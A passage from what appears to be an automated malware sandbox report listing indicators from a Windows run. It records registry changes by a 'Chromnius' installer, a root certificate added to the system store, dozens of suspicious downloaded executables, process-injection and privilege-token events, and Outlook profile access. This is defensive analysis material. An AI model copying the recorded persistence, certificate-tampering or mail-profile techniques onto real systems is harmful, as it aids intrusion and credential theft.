value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe" setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\shell\open\command setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\AppUserModelId = "Chromnius.WXVEMRSTIGYW5ZPQXNSLO4DCFE" setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.svg setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.SLN\ = "SLN_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 60E0G7UKRntM1TQ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 84003100000000008555cabb1100444f574e4c4f7e3100006c0009000400efbe0c5519998555cabb2e0000007fe1010000000100000000000000000042000000000071127f0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32 setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm\OpenWithProgids setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\SLN_auto_file\shell OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xhtml\OpenWithProgids setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.html\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.shtml setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.webp setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\SLN_auto_file\shell\edit\command OpenWith.exe -
Processes:
chromnius.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD chromnius.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f chromnius.exe -
NTFS ADS 33 IoCs
Processes:
firefox.exefirefox.exe7.exetord.exeExplorer.EXEcmd.exe60E0G7UKRntM1TQ.exevbc(2).exenewversion2.exedescription ioc process File created C:\Users\Admin\Downloads\Adobe_Lightroom.rar:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\yy.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\RustExternal%u202Enls..scr:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Miljoeministeren.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\build.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\614.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\pigalicapi.exe\:Zone.Identifier:$DATA 7.exe File created C:\Users\Admin\Downloads\7z2201-x64.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\tord.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe\:Zone.Identifier:$DATA tord.exe File created C:\Users\Admin\Downloads\makanaki.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\vbc.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\LoaderAVX.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\WalkenBoost.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\ucjrufs\:Zone.Identifier:$DATA Explorer.EXE File created C:\Users\Admin\AppData\Roaming\Miriuk\Miruik.exe\:Zone.Identifier:$DATA cmd.exe File created C:\Users\Admin\Downloads\7.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\newversion2.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\8.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\HVUIOPMN.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\ChromeSetup.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\64.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\alaat2.1.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\vbc(1).exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\norza.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\ePnxkugSsfE.exe\:Zone.Identifier:$DATA 60E0G7UKRntM1TQ.exe File created C:\Users\Admin\Downloads\file.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\vbc(2).exe:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kniemwbpljw\Piutmyre.exe\:Zone.Identifier:$DATA vbc(2).exe File created C:\Users\Admin\Downloads\Photoshop2022.rar:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\jeymo2.1.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Putty\puttydata.exe\:Zone.Identifier:$DATA newversion2.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 5064 PING.EXE 3508 PING.EXE 2920 PING.EXE 4332 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
Explorer.EXEpid process 3064 Explorer.EXE 3064 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ycayuhnew.execmstp.exevbc.exebuild.exeenqnjvfa.exepid process 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 2312 vbc.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 424 build.exe 424 build.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe -
Suspicious behavior: GetForegroundWindowSpam 13 IoCs
Processes:
vbc(2).exeAddInProcess32.exeOpenWith.exetaskmgr.exeExplorer.EXE60E0G7UKRntM1TQ.exeOpenWith.exesvchosts.exeOpenWith.exezgoqp.exefirefox.exexrfqtvbjh.exeRegAsm.exepid process 3896 vbc(2).exe 4700 AddInProcess32.exe 4908 OpenWith.exe 1120 taskmgr.exe 3064 Explorer.EXE 3636 60E0G7UKRntM1TQ.exe 5760 OpenWith.exe 1484 svchosts.exe 6836 OpenWith.exe 2560 zgoqp.exe 4860 firefox.exe 3188 xrfqtvbjh.exe 5680 RegAsm.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 648 648 648 648 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
ycayuhnew.exeycayuhnew.execmstp.exezgoqp.exeenqnjvfa.exeenqnjvfa.exeAddInProcess32.exexrfqtvbjh.exe60E0G7UKRntM1TQ.exepid process 3964 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 3960 ycayuhnew.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 3872 zgoqp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 1748 enqnjvfa.exe 1748 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 524 enqnjvfa.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4700 AddInProcess32.exe 4844 cmstp.exe 4844 cmstp.exe 2988 xrfqtvbjh.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 3636 60E0G7UKRntM1TQ.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe 4844 cmstp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
firefox.exeycayuhnew.execmstp.exeExplorer.EXEvbc.exeenqnjvfa.exevbc(1).exedescription pid process Token: SeDebugPrivilege 4860 firefox.exe Token: SeDebugPrivilege 4860 firefox.exe Token: SeDebugPrivilege 3960 ycayuhnew.exe Token: SeDebugPrivilege 4844 cmstp.exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeDebugPrivilege 2312 vbc.exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeDebugPrivilege 4860 firefox.exe Token: SeDebugPrivilege 4860 firefox.exe Token: SeDebugPrivilege 524 enqnjvfa.exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeDebugPrivilege 4892 vbc(1).exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
firefox.exetaskmgr.exeExplorer.EXEpid process 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 3064 Explorer.EXE 3064 Explorer.EXE 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 4860 firefox.exe 1120 taskmgr.exe 4860 firefox.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
firefox.exetaskmgr.exepid process 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 4860 firefox.exe 1120 taskmgr.exe 4860 firefox.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe 1120 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
firefox.exezgoqp.exepid process 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 2560 zgoqp.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe 4860 firefox.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3064 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
firefox.exefirefox.exedescription pid process target process PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4152 wrote to memory of 4860 4152 firefox.exe firefox.exe PID 4860 wrote to memory of 1280 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 1280 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 3648 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe PID 4860 wrote to memory of 4504 4860 firefox.exe firefox.exe -
outlook_office_path 1 IoCs
Processes:
Regsvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Regsvcs.exe -
outlook_win_path 1 IoCs
Processes:
